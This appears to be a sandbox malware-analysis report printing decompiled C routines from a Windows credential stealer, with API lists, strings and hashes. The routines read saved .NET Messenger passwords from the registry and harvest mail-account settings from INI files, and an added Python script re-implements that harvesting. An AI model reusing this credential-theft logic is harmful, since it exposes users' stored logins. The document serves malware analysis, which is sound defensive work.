                                                                                                                                                                  					if(_v8 != _t67) {
                                                                                                                                                                  						_v557 = 0;
                                                                                                                                                                  						E0040132A( &_v1580,  &(_t63[0x100]), 0xff);
                                                                                                                                                                  						_v8 = 0xff;
                                                                                                                                                                  						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
                                                                                                                                                                  						if(_t48 == 0) {
                                                                                                                                                                  							_t63[0xfe] = _t48;
                                                                                                                                                                  							_t63[0x1fe] = _t48;
                                                                                                                                                                  							_v16 = 1;
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  					goto L13;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t69 =  &_v556;
                                                                                                                                                                  				E004046E1( &_v556);
                                                                                                                                                                  				if(E004047AA(_t69, _t74) == 0) {
                                                                                                                                                                  					L8:
                                                                                                                                                                  					E004047FB( &_v556);
                                                                                                                                                                  					_t67 = 0;
                                                                                                                                                                  					goto L10;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v32 = _v12 + 0xfffffffe;
                                                                                                                                                                  				_v28 =  &_v1578;
                                                                                                                                                                  				if(E0040481B(_t69,  &_v32, 0,  &_v24) == 0) {
                                                                                                                                                                  					goto L8;
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v24 < 0x400) {
                                                                                                                                                                  					memcpy( &_v1580, _v20, _v24);
                                                                                                                                                                  					_v8 = 1;
                                                                                                                                                                  				}
                                                                                                                                                                  				LocalFree(_v20);
                                                                                                                                                                  				goto L8;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7479F420), ref: 0040DB33
                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040DC08
                                                                                                                                                                    • Part of subcall function 004046E1: strcpy.MSVCRT ref: 00404730
                                                                                                                                                                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040DBA4
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040DBB6
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040DC2A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                                                                                                  • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                                                                                                  • API String ID: 3289975857-105384665
                                                                                                                                                                  • Opcode ID: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                                                                                                                                                                  • Instruction ID: 0f5ec9c9176e8b350c57746001926e44edf78976103d06fec131b918f38f0bed
                                                                                                                                                                  • Opcode Fuzzy Hash: eb632091883fd6e530ae975b2f8be387ac57602a28e3de930a5c8a5ebe1e7b21
                                                                                                                                                                  • Instruction Fuzzy Hash: 02315871D01219AFCB21DFA1CC44BDEBBB8AF49314F1040B6E505B7290D6789B88DB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                                  			E00405E50(long __edi, char* _a4) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				void* _t8;
                                                                                                                                                                  				void* _t10;
                                                                                                                                                                  				long _t14;
                                                                                                                                                                  				long _t24;
                                                                                                                                                                  
                                                                                                                                                                  				_t24 = __edi;
                                                                                                                                                                  				_t1 = _t24 - 0x834; // -2100
                                                                                                                                                                  				_t8 = 0;
                                                                                                                                                                  				_t14 = 0x1100;
                                                                                                                                                                  				if(_t1 <= 0x383) {
                                                                                                                                                                  					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
                                                                                                                                                                  					if(0 != 0) {
                                                                                                                                                                  						_t14 = 0x1900;
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
                                                                                                                                                                  					_t10 = strcpy(_a4, "Unknown Error");
                                                                                                                                                                  				} else {
                                                                                                                                                                  					if(strlen(_v8) < 0x400) {
                                                                                                                                                                  						strcpy(_a4, _v8);
                                                                                                                                                                  					}
                                                                                                                                                                  					_t10 = LocalFree(_v8);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t10;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F6F,?,?), ref: 00405E75
                                                                                                                                                                  • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F6F,?,?), ref: 00405E93
                                                                                                                                                                  • strlen.MSVCRT ref: 00405EA0
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?,00405F6F,?,?), ref: 00405EB0
                                                                                                                                                                  • LocalFree.KERNEL32(?,?,?,00405F6F,?,?), ref: 00405EBA
                                                                                                                                                                  • strcpy.MSVCRT(?,Unknown Error,?,?,00405F6F,?,?), ref: 00405ECA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                  • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                  • API String ID: 3198317522-572158859
                                                                                                                                                                  • Opcode ID: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                  • Instruction ID: ee7e3b4bfe4f381a5a8dca6b6b4a58a66687d49b648cda9812902ba604a22f70
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f56a8b7da271a810a769b22d2f728ab30919581b98e2cd5870482cf17005fbc
                                                                                                                                                                  • Instruction Fuzzy Hash: DC01D432604214BEEB245B61DC46EDF7E68EB09796B20403AF602B41D0DA759F40DADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 88%
E0040831F(void* __eflags, char* _a4) {
	void* __esi;
	void* _t3;
	int _t6;

	// E00406155 probes the path with GetFileAttributesA (see APIs below); nothing is read if the file is absent
	_t3 = E00406155(_a4);
	if(_t3 != 0) {
		// unbounded strcpy of the caller-supplied INI path and the section name into fixed global buffers
		strcpy(0x4181b8, _a4);
		strcpy(0x4182c0, "general");
		// [general] rtl=... from the INI file at 0x4181b8, stored as a 0/1 flag at 0x418304
		_t6 = GetPrivateProfileIntA(0x4182c0, "rtl", 0, 0x4181b8);
		asm("sbb eax, eax");
		 *0x418304 =  ~(_t6 - 1) + 1;
		// E00407F2B wraps GetPrivateProfileStringA: read charset, TranslatorName and TranslatorURL into globals
		E00407F2B(0x418308, "charset", 0x3f);
		E00407F2B(0x418348, "TranslatorName", 0x3f);
		return E00407F2B(0x418388, "TranslatorURL", 0xff);
	}
	return _t3;
}
Instruction addresses: 0x00408323 0x0040832b 0x00408339 0x00408349 0x0040835a 0x00408363 0x00408372 0x00408377 0x00408388 0x00000000 0x004083a5 0x004083a6

APIs
  • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
• strcpy.MSVCRT(004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408339
• strcpy.MSVCRT(004182C0,general,004181B8,00000000,00000000,00000000,004083DE,00000000,?,00000000,00000104,?), ref: 00408349
• GetPrivateProfileIntA.KERNEL32 ref: 0040835A
  • Part of subcall function 00407F2B: GetPrivateProfileStringA.KERNEL32(004182C0,?,0041344F,00418308,?,004181B8), ref: 00407F46
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: PrivateProfilestrcpy$AttributesFileString
• String ID: TranslatorName$TranslatorURL$charset$general$rtl
• API String ID: 185930432-2039793938
• Opcode ID: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
• Instruction ID: 927989a77509199662194d441518c64dc34f1856eccff2a3d84bf87df20cc289
• Opcode Fuzzy Hash: 096529db9ad1171b6712faedd0256edc65327acc83deb5f5860257c904a951f2
• Instruction Fuzzy Hash: 00F0C232EC421539C62036615C07FEA3A148BE2F10F08447FBD04B61C2EA7D49D1815E
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 92%
E004088C6(void* __eax, void* __eflags, signed int _a4, short _a8) {
	char _v8;
	signed int _v12;
	signed int _v16;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t96;
	signed int _t98;
	void* _t99;
	signed int _t104;
	signed short _t107;
	signed int _t110;
	intOrPtr _t114;
	signed int _t117;
	signed int _t119;
	signed short _t121;
	signed int _t122;
	signed int _t152;
	signed int _t156;
	signed int _t158;
	signed int _t161;
	signed int _t163;
	signed int _t168;
	signed int _t169;
	signed int _t170;
	void* _t172;
	void* _t173;
	void* _t174;
	void* _t178;
	intOrPtr _t180;

	_t174 = __eflags;
	_t172 = __eax;
	E004086DC(__eax);
	 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
	// 13 entries (0xd); L00412090 is called with a byte count and its result is used as a buffer pointer,
	// so it is read here as an allocator (inferred from usage, not resolved by the sandbox)
	_t122 = 0xd;
	 *((intOrPtr*)(_t172 + 0x184)) = _a4;
	_t156 = 0x14;
	_t96 = _t122 * _t156;
	 *(_t172 + 0x1b0) = _t122;
	_push( ~(0 | _t174 > 0x00000000) | _t96);
	L00412090();
	 *(_t172 + 0x1b4) = _t96;
	_t158 = 0x10;
	_t98 = _t122 * _t158;
	_push( ~(0 | _t174 > 0x00000000) | _t98);
	L00412090();
	 *(_t172 + 0x34) = _t98;
	// walk the 13 static 0x24-byte records between 0x4178e0 and 0x417ab4 ((0x417ab4 - 0x4178e0) / 0x24 == 13):
	// the first 0x14 bytes go into the +0x1b4 table, the next 0x10 bytes into the +0x34 table
	_v8 = 0x4178e0;
	do {
		_t21 =  &_v8; // 0x4178e0
		_t99 =  *_t21;
		_t168 =  *_t99;
		_v12 = _t168;
		_t169 = _t168 * 0x14;
		memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
		_t24 =  &_v8; // 0x4178e0
		_t104 = _v12 << 4;
		_v12 = _t104;
		memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
		_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
		_t173 = _t173 + 0x18;
		_v16 = _t107;
		 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
		// a value with a zero high word is treated as an ID and resolved through E00407A69 in both tables
		if((_t107 & 0xffff0000) == 0) {
			 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E00407A69(_t107 & 0x0000ffff);
			_t121 = E00407A69(_v16 | 0x00010000);
			 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
			_t122 = 0xd;
		}
		_v8 = _v8 + 0x24;
		_t178 = _v8 - 0x417ab4;
	} while (_t178 < 0);
	 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
	 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
	_t161 = 4;
	_t110 = _t122 * _t161;
	 *(_t172 + 0x20) = _t122;
	 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
	_push( ~(0 | _t178 > 0x00000000) | _t110);
	L00412090();
	_push(0xc);
	 *(_t172 + 0x24) = _t110;
	L00412090();
	_t170 = _t110;
	if(_t170 == 0) {
		_t170 = 0;
		__eflags = 0;
	} else {
		// 12-byte descriptor: +8 = _a4, +4 = entry count (13), +0 = array of 13 4-byte records
		_t114 =  *((intOrPtr*)(_t172 + 0x48));
		_t180 = _t114;
		_a8 = _t114;
		if(_t180 == 0) {
			_a8 = 0x64; // default of 100 when the value at +0x48 is zero
		}
		 *((intOrPtr*)(_t170 + 8)) = _a4;
		_t163 = 4;
		_t117 = _t122 * _t163;
		 *(_t170 + 4) = _t122;
		_push( ~(0 | _t180 > 0x00000000) | _t117);
		L00412090();
		_a4 = _a4 & 0x00000000;
		 *_t170 = _t117;
		// each record: low word = _a8, high word = its own index
		do {
			_t152 = _a4;
			_t119 = _t152 << 2;
			_a4 = _a4 + 1;
			 *( *_t170 + _t119 + 2) = _t152;
			 *((short*)(_t119 +  *_t170)) = _a8;
		} while (_a4 < _t122);
	}
	 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
	 *(_t172 + 0x1a0) = _t170;
	 *((intOrPtr*)(_t172 + 0x40)) = 1;
	 *((intOrPtr*)(_t172 + 0x198)) = 1;
	 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
	 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
	 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
	return E00408846(_t172);
}

                                                                                                                                                                  0x004088c6
                                                                                                                                                                  0x004088cf
                                                                                                                                                                  0x004088d1
                                                                                                                                                                  0x004088d9
                                                                                                                                                                  0x004088df
                                                                                                                                                                  0x004088e0
                                                                                                                                                                  0x004088ea
                                                                                                                                                                  0x004088ed
                                                                                                                                                                  0x004088f2
                                                                                                                                                                  0x004088fc
                                                                                                                                                                  0x004088fd
                                                                                                                                                                  0x00408902
                                                                                                                                                                  0x0040890c
                                                                                                                                                                  0x0040890f
                                                                                                                                                                  0x00408918
                                                                                                                                                                  0x00408919
                                                                                                                                                                  0x00408920
                                                                                                                                                                  0x00408923
                                                                                                                                                                  0x0040892a
                                                                                                                                                                  0x0040892a
                                                                                                                                                                  0x0040892a
                                                                                                                                                                  0x0040892d
                                                                                                                                                                  0x0040892f
                                                                                                                                                                  0x00408932
                                                                                                                                                                  0x00408941
                                                                                                                                                                  0x00408946
                                                                                                                                                                  0x00408955
                                                                                                                                                                  0x0040895b
                                                                                                                                                                  0x0040895e
                                                                                                                                                                  0x00408969
                                                                                                                                                                  0x00408973
                                                                                                                                                                  0x0040897b
                                                                                                                                                                  0x0040897e
                                                                                                                                                                  0x00408982
                                                                                                                                                                  0x0040899b
                                                                                                                                                                  0x0040899f
                                                                                                                                                                  0x004089ac
                                                                                                                                                                  0x004089b0
                                                                                                                                                                  0x004089b0
                                                                                                                                                                  0x004089b1
                                                                                                                                                                  0x004089b5
                                                                                                                                                                  0x004089b5
                                                                                                                                                                  0x004089c5
                                                                                                                                                                  0x004089c9
                                                                                                                                                                  0x004089d0
                                                                                                                                                                  0x004089d3
                                                                                                                                                                  0x004089d8
                                                                                                                                                                  0x004089db
                                                                                                                                                                  0x004089e6
                                                                                                                                                                  0x004089e7
                                                                                                                                                                  0x004089ec
                                                                                                                                                                  0x004089ee
                                                                                                                                                                  0x004089f1
                                                                                                                                                                  0x004089f6
                                                                                                                                                                  0x004089fc
                                                                                                                                                                  0x00408a58
                                                                                                                                                                  0x00408a58
                                                                                                                                                                  0x004089fe
                                                                                                                                                                  0x004089fe
                                                                                                                                                                  0x00408a01
                                                                                                                                                                  0x00408a03
                                                                                                                                                                  0x00408a06
                                                                                                                                                                  0x00408a08
                                                                                                                                                                  0x00408a08
                                                                                                                                                                  0x00408a12
                                                                                                                                                                  0x00408a19
                                                                                                                                                                  0x00408a1c
                                                                                                                                                                  0x00408a21
                                                                                                                                                                  0x00408a28
                                                                                                                                                                  0x00408a29
                                                                                                                                                                  0x00408a2e
                                                                                                                                                                  0x00408a33
                                                                                                                                                                  0x00408a35
                                                                                                                                                                  0x00408a35
                                                                                                                                                                  0x00408a3c
                                                                                                                                                                  0x00408a3f
                                                                                                                                                                  0x00408a45
                                                                                                                                                                  0x00408a50
                                                                                                                                                                  0x00408a50
                                                                                                                                                                  0x00408a56
                                                                                                                                                                  0x00408a5a
                                                                                                                                                                  0x00408a64
                                                                                                                                                                  0x00408a6c
                                                                                                                                                                  0x00408a6f
                                                                                                                                                                  0x00408a75
                                                                                                                                                                  0x00408a7b
                                                                                                                                                                  0x00408a81
                                                                                                                                                                  0x00408a94

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086E8
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 004086F6
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408707
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 0040871E
                                                                                                                                                                    • Part of subcall function 004086DC: ??3@YAXPAX@Z.MSVCRT ref: 00408727
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004088FD
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408919
                                                                                                                                                                  • memcpy.MSVCRT ref: 00408941
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040895E
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004089E7
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004089F1
                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00408A29
                                                                                                                                                                    • Part of subcall function 00407A69: LoadStringA.USER32 ref: 00407B32
                                                                                                                                                                    • Part of subcall function 00407A69: memcpy.MSVCRT ref: 00407B71
                                                                                                                                                                    • Part of subcall function 00407A69: strcpy.MSVCRT(004182C0,strings,?,?,0040898C,?,?,?,?,?,00000000,76D24DE0), ref: 00407AE4
                                                                                                                                                                    • Part of subcall function 00407A69: strlen.MSVCRT ref: 00407B02
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                                                                                                  • String ID: d$xA
                                                                                                                                                                  • API String ID: 3781940870-3129348561
                                                                                                                                                                  • Opcode ID: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
                                                                                                                                                                  • Instruction ID: 74bd4705b90376de5a47ec474c9ee228b959cea471a61b54eb6c1cdd4b9bc2c0
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a9e4da96f2f7e0bde87e55aae0f47c2a3c86f5c95d1692b49de27a05e9aa5de
                                                                                                                                                                  • Instruction Fuzzy Hash: 62515C71A01704AFD724DF39C58179ABBE4EF48354F10852EE59ADB381DB74A941CF44
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 67%
                                                                                                                                                                  			E00403127(void* __eax, intOrPtr _a4, char* _a8) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                                  				char _v188;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				char _v524;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				char* _t53;
                                                                                                                                                                  				void* _t60;
                                                                                                                                                                  				void* _t65;
                                                                                                                                                                  				char* _t70;
                                                                                                                                                                  
                                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                                  				_t65 = __eax;
                                                                                                                                                                  				 *((intOrPtr*)(__eax + 0x8c)) = 3;
                                                                                                                                                                  				 *((intOrPtr*)(__eax + 0x210)) = 1;
                                                                                                                                                                  				E004030F9(_a4, "UsesIMAP",  &_v524, 0xff, _a8);
                                                                                                                                                                  				if(_v524 == 0x31) {
                                                                                                                                                                  					 *((intOrPtr*)(_t65 + 0x210)) = 2;
                                                                                                                                                                  				}
                                                                                                                                                                  				_v12 = _t65 + 0x110;
                                                                                                                                                                  				E004030F9(_a4, "PopServer", _t65 + 0x110, 0x7f, _a8);
                                                                                                                                                                  				_t70 = _t65 + 0x214;
                                                                                                                                                                  				E004030F9(_a4, "LoginName", _t70, 0x7f, _a8);
                                                                                                                                                                  				E004030F9(_a4, "RealName", _t65 + 0xc, 0x7f, _a8);
                                                                                                                                                                  				E004030F9(_a4, "ReturnAddress", _t65 + 0x90, 0x7f, _a8);
                                                                                                                                                                  				E004030F9(_a4, "SavePasswordText",  &_v268, 0xff, _a8);
                                                                                                                                                                  				if(_v268 != 0) {
                                                                                                                                                                  					_v188 = 0;
                                                                                                                                                                  					E00401D19( &_v268, _t65 + 0x294);
                                                                                                                                                                  					if( *_t70 == 0) {
                                                                                                                                                                  						_push(_a8);
                                                                                                                                                                  						_t60 = 0x7f;
                                                                                                                                                                  						_push(_t60);
                                                                                                                                                                  						_push(_t70);
                                                                                                                                                                  						_push("PopAccount");
                                                                                                                                                                  						_push(_a4);
                                                                                                                                                                  						E004030F9();
                                                                                                                                                                   						if( *_t70 != 0) {                              /* value returned from the INI lookup is non-empty */
                                                                                                                                                                   							_t53 = strchr(_t70, 0x40);              /* look for '@' in the value */
                                                                                                                                                                   							_a8 = _t53;
                                                                                                                                                                   							if(_t53 != 0) {
                                                                                                                                                                   								E004060DA(_t60, _v12,  &(_t53[1])); /* copy the text after '@' into _v12 (host part) */
                                                                                                                                                                   								 *_a8 = 0;                           /* truncate at '@': _t70 now holds the user part */
                                                                                                                                                                   							}
                                                                                                                                                                   						}
                                                                                                                                                                   					}
                                                                                                                                                                   					_v8 = 1;
                                                                                                                                                                   				}
                                                                                                                                                                   				if( *_t70 != 0) {                                          /* report success whenever a value was found */
                                                                                                                                                                   					_v8 = 1;
                                                                                                                                                                   				}
                                                                                                                                                                  				return _v8;
                                                                                                                                                                  			}

                                                                                                                                                                   Source addresses: 0x00403130 to 0x00403275 (one address per decompiled line)


                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004030F9: GetPrivateProfileStringA.KERNEL32(00000000,?,0041344F,?,?,?), ref: 0040311D
                                                                                                                                                                  • strchr.MSVCRT ref: 0040323C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                   • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileStringstrchr
                                                                                                                                                                  • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                  • API String ID: 1348940319-1729847305
                                                                                                                                                                  • Opcode ID: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                                                                                                                                                                  • Instruction ID: 730259ebfdc93430ac8a7640b0a1394381beeb8186f258e339b1e1584fb818e0
                                                                                                                                                                  • Opcode Fuzzy Hash: 4f3761682ac34aea950079ee6e15d32a83a9ea860df6d03b5968914b8edab4df
                                                                                                                                                                  • Instruction Fuzzy Hash: FF31917150420ABEEF219F60CC06FD97F6CAF10359F10806AF558761D2CBB9AB949B54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%
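The fragment above reads mail-account settings from an INI file through GetPrivateProfileStringA (the requested keys are the ones listed under String ID: LoginName, PopAccount, PopServer, RealName, ReturnAddress, SavePasswordText, UsesIMAP) and, when a value contains '@', splits it into the part before and the part after the sign. The following Python is an added illustration of that harvesting logic, not code from the sample or from the report; the section name "Settings", the choice of PopAccount as the value that gets split, and the INI content itself are assumptions made here to have something to run.

```python
import configparser
from typing import Dict, Optional, Tuple

# Keys the routine asks GetPrivateProfileStringA for (taken from the report's String ID list).
INI_KEYS = ("LoginName", "PopAccount", "PopServer", "RealName",
            "ReturnAddress", "SavePasswordText", "UsesIMAP")

# Constructed sample INI; the [Settings] section name is an assumption, not from the report.
SAMPLE_INI = """[Settings]
PopAccount=alice@pop.example.net
LoginName=alice
RealName=Alice Example
ReturnAddress=alice@example.net
SavePasswordText=
UsesIMAP=0
"""


def split_at_sign(value: str) -> Tuple[str, Optional[str]]:
    """Mirror of strchr(buf, '@'): the text after '@' is copied to a second buffer and
    the '@' is overwritten with NUL, so the first buffer keeps only the user part.
    Without an '@' nothing is split."""
    at = value.find("@")
    if at < 0:
        return value, None
    return value[:at], value[at + 1:]


def harvest(ini_text: str, section: str = "Settings") -> Dict[str, str]:
    """Emulate the values the stealer would pull out of one INI section.
    configparser lowercases option names, which matches the case-insensitive
    key lookup of GetPrivateProfileStringA; section names stay case-sensitive here."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(ini_text)
    found: Dict[str, str] = {}
    if not cp.has_section(section):
        return found
    for key in INI_KEYS:
        value = cp.get(section, key, fallback="")
        if value == "":            # GetPrivateProfileStringA returned nothing: skipped
            continue
        found[key] = value
    # Assumption: the '@' split in the decompiled code applies to PopAccount.
    account = found.get("PopAccount")
    if account is not None:
        user, host = split_at_sign(account)
        found["PopAccount"] = user
        if host is not None and "PopServer" not in found:
            found["PopServer"] = host
    return found


if __name__ == "__main__":
    for k, v in harvest(SAMPLE_INI).items():
        print(f"{k} = {v}")
```

Running it against the constructed INI shows exactly which fields leave the host: the user part of the account, the server derived from it, the display name and the return address. An empty SavePasswordText is dropped, as the routine only reports success when the buffer is non-empty.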

                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                   			/* Copies the NUL-terminated string in eax to the buffer in ecx, replacing
                                                                                                                                                                   			   '<' '>' '"' 0xB0 '&' and '\n' with HTML entities. The destination has no
                                                                                                                                                                   			   size parameter and no bounds check; each input byte can become up to 6. */
                                                                                                                                                                   			E0040F70E(char* __eax, void* __ecx) {
                                                                                                                                                                   				void* _t2;
                                                                                                                                                                   				char* _t3;
                                                                                                                                                                   				void* _t5;
                                                                                                                                                                   				void* _t6;
                                                                                                                                                                   				void* _t7;
                                                                                                                                                                   
                                                                                                                                                                   				_t3 = __eax;                         /* source cursor */
                                                                                                                                                                   				_t6 = __ecx;                         /* destination cursor */
                                                                                                                                                                   				_t5 = 4;                             /* length of the 4-byte entities */
                                                                                                                                                                   				while(1) {
                                                                                                                                                                   					_t2 =  *_t3;
                                                                                                                                                                   					if(_t2 != 0x3c) {                /* '<' */
                                                                                                                                                                   						goto L3;
                                                                                                                                                                   					}
                                                                                                                                                                   					_push(_t5);
                                                                                                                                                                   					_push("&lt;");
                                                                                                                                                                   					L14:                                 /* memcpy(dst, entity, 4); args are the two pushes above */
                                                                                                                                                                   					_t2 = memcpy(_t6, ??, ??);
                                                                                                                                                                   					_t7 = _t7 + 0xc;                 /* cdecl cleanup of the three arguments */
                                                                                                                                                                   					_t6 = _t6 + _t5;
                                                                                                                                                                   					L16:
                                                                                                                                                                   					if( *_t3 != 0) {
                                                                                                                                                                   						_t3 = _t3 + 1;
                                                                                                                                                                   						continue;
                                                                                                                                                                   					}
                                                                                                                                                                   					return _t2;                      /* no NUL terminator is written to the destination */
                                                                                                                                                                   					L3:
                                                                                                                                                                   					if(_t2 != 0x3e) {                /* '>' */
                                                                                                                                                                   						if(_t2 != 0x22) {            /* '"' */
                                                                                                                                                                   							if(_t2 != 0xb0) {        /* degree sign in the ANSI code page */
                                                                                                                                                                   								if(_t2 != 0x26) {    /* '&' */
                                                                                                                                                                   									if(_t2 != 0xa) { /* '\n' */
                                                                                                                                                                   										 *_t6 = _t2; /* any other byte is copied unchanged */
                                                                                                                                                                   										_t6 = _t6 + 1;
                                                                                                                                                                   									} else {
                                                                                                                                                                   										_push(_t5);
                                                                                                                                                                   										_push("<br>");
                                                                                                                                                                   										goto L14;
                                                                                                                                                                   									}
                                                                                                                                                                   								} else {
                                                                                                                                                                   									_push(5);
                                                                                                                                                                   									_push("&amp;");
                                                                                                                                                                   									goto L11;
                                                                                                                                                                   								}
                                                                                                                                                                   							} else {
                                                                                                                                                                   								_push(5);
                                                                                                                                                                   								_push("&deg;");
                                                                                                                                                                   								L11:                         /* memcpy(dst, entity, 5) */
                                                                                                                                                                   								_t2 = memcpy(_t6, ??, ??);
                                                                                                                                                                   								_t7 = _t7 + 0xc;
                                                                                                                                                                   								_t6 = _t6 + 5;
                                                                                                                                                                   							}
                                                                                                                                                                   						} else {
                                                                                                                                                                   							_t2 = memcpy(_t6, "&quot;", 6); /* the only 6-byte expansion */
                                                                                                                                                                   							_t7 = _t7 + 0xc;
                                                                                                                                                                   							_t6 = _t6 + 6;
                                                                                                                                                                   						}
                                                                                                                                                                   					} else {
                                                                                                                                                                   						_push(_t5);
                                                                                                                                                                   						_push("&gt;");
                                                                                                                                                                   						goto L14;
                                                                                                                                                                   					}
                                                                                                                                                                   					goto L16;
                                                                                                                                                                   				}
                                                                                                                                                                   			}
